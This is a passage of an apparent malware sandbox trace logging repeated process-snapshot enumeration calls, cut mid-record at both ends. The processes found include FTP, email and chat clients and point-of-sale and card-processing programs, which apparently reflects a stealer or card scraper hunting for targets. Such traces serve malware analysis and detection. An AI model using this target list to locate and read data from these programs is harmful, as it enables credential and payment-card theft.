th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0216.149] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0216.151] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0216.156] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0216.158] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0216.160] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0216.162] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0216.164] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0216.165] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0216.167] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0216.173] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0216.175] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0216.177] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0216.179] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0216.181] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0216.282] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0216.284] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0216.286] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0216.287] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0216.288] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0216.290] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0216.295] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0216.297] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0216.299] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0216.301] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0216.303] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0216.304] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0216.306] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0216.310] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0216.312] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0216.314] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0216.316] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0216.318] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0216.319] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0216.321] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0216.398] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0216.400] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0216.404] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0216.406] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0216.407] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0216.409] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0216.411] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0216.412] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0216.414] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0216.415] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0216.419] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0216.421] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0216.422] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0216.424] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0216.426] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0216.427] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0216.428] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0216.430] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0216.431] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0216.436] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0216.438] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0216.439] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0216.441] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0216.442] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0216.444] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0216.445] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0216.447] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0216.469] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0216.471] CloseHandle (hObject=0x1018) returned 1 [0216.471] Sleep (dwMilliseconds=0x64) [0216.575] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0216.590] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.592] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0216.594] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0216.596] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.598] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0216.600] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.602] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0216.604] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0216.606] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0216.608] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.610] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.612] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0216.613] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.615] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.616] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.617] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.619] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.672] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.674] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.676] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0216.677] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0216.679] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, 